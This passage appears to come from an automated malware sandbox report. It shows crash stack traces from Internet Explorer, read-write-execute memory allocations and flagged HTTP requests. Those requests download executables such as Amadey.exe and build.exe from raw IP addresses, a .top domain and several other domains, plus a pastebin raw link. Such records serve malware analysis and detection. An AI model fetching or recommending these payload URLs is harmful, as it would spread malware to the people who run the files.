GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 96335116 registers.edi: 8775908 registers.eax: 96335116 registers.ebp: 96335196 registers.edx: 618 registers.ebx: 96335480 registers.esi: 2147746133 registers.ecx: 81507464	1
__exception__ Oct. 19, 2023, 7:49 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6f12540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6f1252ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6f200ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 64871344 registers.edi: 1974991376 registers.eax: 64871344 registers.ebp: 64871424 registers.edx: 1 registers.ebx: 9031580 registers.esi: 2147746133 registers.ecx: 1925805225	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (12 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://172.86.97.117/himeffectivelyproress.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://85.217.144.143/files/Amadey.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://85.217.144.143/files/My2.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://galandskiyher5.com/downloads/toolspub1.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://gons01b.top/build.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://104.194.128.170/svp/Ykwrxaauw.dat
suspicious_features	GET method with no useragent header	suspicious_request	GET https://pastebin.com/raw/HPj0MzD6
suspicious_features	GET method with no useragent header	suspicious_request	GET https://flyawayaero.net/baf14778c246e15550645e30ba78ce1c.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://grabyourpizza.com/7a54bdb20779c4359694feaa1398dd25.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://potatogoose.com/4d1aaeb879448e5236e36d2209b40d34/baf14778c246e15550645e30ba78ce1c.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://diplodoka.net/4d1aaeb879448e5236e36d2209b40d34/7a54bdb20779c4359694feaa1398dd25.exe

Performs some HTTP requests (14 events)

request	GET http://172.86.97.117/himeffectivelyproress.exe
request	GET http://85.217.144.143/files/Amadey.exe
request	GET http://85.217.144.143/files/My2.exe
request	GET http://galandskiyher5.com/downloads/toolspub1.exe
request	GET http://gons01b.top/build.exe
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
request	GET http://104.194.128.170/svp/Ykwrxaauw.dat
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://pastebin.com/raw/HPj0MzD6
request	GET https://flyawayaero.net/baf14778c246e15550645e30ba78ce1c.exe
request	GET https://grabyourpizza.com/7a54bdb20779c4359694feaa1398dd25.exe
request	GET https://potatogoose.com/4d1aaeb879448e5236e36d2209b40d34/baf14778c246e15550645e30ba78ce1c.exe
request	GET https://diplodoka.net/4d1aaeb879448e5236e36d2209b40d34/7a54bdb20779c4359694feaa1398dd25.exe

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

gons01b.top

description

Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 125 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00550000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f62000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00660000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00432000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00565000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00567000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00556000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 77824 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c2e000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2456 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00320000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 192512 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008fe000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2640 region_size: 331776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2696 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4161536 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02640000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2696 region_size: 9351168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2888 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4161536 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2888 region_size: 9351168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 region_size: 13570048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02740000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03430000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70813000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x708b7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76af9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75ac2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75602000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2148 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:49 a.m.	process_identifier: 2148 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e761000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2844 region_size: 1314816 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ce0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2844 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 7:47 a.m.	process_identifier: 2844 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 2148 crashed
__exception__ Oct. 19, 2023, 7:49 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 96335116 registers.edi: 8775908 registers.eax: 96335116 registers.ebp: 96335196 registers.edx: 618 registers.ebx: 96335480 registers.esi: 2147746133 registers.ecx: 81507464	1	0	0
__exception__ Oct. 19, 2023, 7:49 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 